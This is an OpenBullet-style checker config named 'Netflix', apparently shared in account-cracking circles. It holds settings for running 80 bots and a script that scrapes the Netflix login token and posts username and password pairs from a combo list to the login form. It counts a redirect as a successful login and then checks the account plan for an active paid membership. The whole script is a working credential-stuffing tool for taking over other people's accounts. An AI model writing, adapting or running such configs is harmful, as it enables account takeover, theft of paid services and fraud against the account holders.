[SETTINGS]
{
  "Name": "Netflix",
  "SuggestedBots": 80,
  "MaxCPM": 0,
  "LastModified": "2019-10-05T19:16:08.7872313-07:00",
  "AdditionalInfo": "",
  "Author": "Unpainful_",
  "Version": "1.4.1 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.netflix.com/login" 
  
  HEADER "Host: www.netflix.com" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "We were unable to process your request" 

PARSE "<SOURCE>" LR "input type=\"hidden\" name=\"authURL\" value=\"" "\"/><input " -> VAR "TOKEN" 

FUNCTION URLEncode "<TOKEN>" -> VAR "TOKEN" 

REQUEST POST "https://www.netflix.com/login" AutoRedirect=FALSE ReadResponseSource=FALSE 
  CONTENT "email=<USER>&password=<PASS>&rememberMe=true&flow=websiteSignUp&mode=login&action=loginAction&withFields=password%2CrememberMe%2CnextPage%2CshowPassword%2Cemail&authURL=<TOKEN>&nextPage=&showPassword=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "<HEADERS(location)>" Exists 
  KEYCHAIN Failure OR 
    KEY "<HEADERS(location)>" DoesNotExist 

REQUEST GET "https://www.netflix.com/ChangePlan" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "membershipStatus\":\"CURRENT_MEMBER\",\"" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"><h1>Sign In</h1" 
    KEY "TRY 30 DAYS FREE</span><span id" 

